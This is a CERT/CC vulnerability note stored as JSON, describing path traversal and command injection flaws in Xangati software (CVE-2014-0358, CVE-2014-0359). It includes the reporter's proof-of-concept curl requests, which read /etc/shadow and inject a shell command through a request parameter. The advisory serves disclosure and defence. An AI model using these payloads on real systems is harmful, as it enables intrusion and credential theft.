{"vuid":"VU#657622","idnumber":"657622","name":"Xangati software release contains relative path traversal and command injection vulnerabilities","keywords":["directory","traversal","command","injection"],"overview":"Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities.","clean_desc":"Xangati's software release contains relative path traversal (CWE-23) and command injection (CWE-78) vulnerabilities. CWE-23: Relative Path Traversal - CVE-2014-0358\nThe reporter has provided the following as a proof-of-concept. Authentication is not required to exploit these vulnerabilities. curl -i -s -k  -X 'POST' \\\n-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \\\n--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \\\n'hxxps://127.10.10.5/servlet/MGConfigData' POST /servlet/MGConfigData HTTP/1.1\nkey=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=127.10.10.5 POST /servlet/MGConfigData HTTP/1.1\nkey=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=127.10.10.5 curl -i -s -k  -X 'POST' \\\n-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \\\n--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \\\n'hxxps://127.10.10.5/servlet/Installer' curl -i -s -k  -X 'POST' \\\n-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \\\n--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow' \\\n'hxxps://127.10.10.5/servlet/MGConfigData' CWE-78: Improper Neutralization of Special Elements used in an OS Command - CVE-2014-0359\nThe reporter has provided the following as a proof-of-concept. Authentication is required to exploit this vulnerability. curl -i -s -k  -X 'POST' \\\n-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \\\n--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\\'cat\\\\x20/etc/shadow\\';$CMD;+YES' \\\n'hxxps://127.10.10.5/servlet/Installer' The CVSS score below is for CVE-2014-0359.","impact":"A remote unauthenticated attacker may be able to read system files. A remote authenticated attacker may be able to run arbitrary system commands.","resolution":"Apply an Update Upgrade to XSR11 or XNR 7 for the appropriate product..","workarounds":"","sysaffected":"","thanks":"Thanks to Jan Kadijk for reporting this vulnerability.","author":"This document was written by Jared Allar.","public":["https://cwe.mitre.org/data/definitions/78.html","https://cwe.mitre.org/data/definitions/23.html","http://xangati.com/products/"],"cveids":["CVE-2014-0358","CVE-2014-0359"],"certadvisory":"","uscerttechnicalalert":null,"datecreated":"2013-12-05T14:25:45Z","publicdate":"2014-04-14T00:00:00Z","datefirstpublished":"2014-04-14T20:30:43Z","dateupdated":"2014-04-14T20:30:46Z","revision":12,"vrda_d1_directreport":"1","vrda_d1_population":"1","vrda_d1_impact":"3","cam_widelyknown":"0","cam_exploitation":"0","cam_internetinfrastructure":"0","cam_population":"0","cam_impact":"0","cam_easeofexploitation":"0","cam_attackeraccessrequired":"0","cam_scorecurrent":"0","cam_scorecurrentwidelyknown":"0","cam_scorecurrentwidelyknownexploited":"0","ipprotocol":"","cvss_accessvector":"N","cvss_accesscomplexity":"L","cvss_authentication":null,"cvss_confidentialityimpact":"C","cvss_integrityimpact":"C","cvss_availabilityimpact":"N","cvss_exploitablity":null,"cvss_remediationlevel":"OF","cvss_reportconfidence":"C","cvss_collateraldamagepotential":"ND","cvss_targetdistribution":"L","cvss_securityrequirementscr":"ND","cvss_securityrequirementsir":"ND","cvss_securityrequirementsar":"ND","cvss_basescore":"9.4","cvss_basevector":"AV:N/AC:L/Au:N/C:C/I:C/A:N","cvss_temporalscore":"8.2","cvss_environmentalscore":"2.052041704272","cvss_environmentalvector":"CDP:ND/TD:L/CR:ND/IR:ND/AR:ND","metric":0.0,"vulnote":null}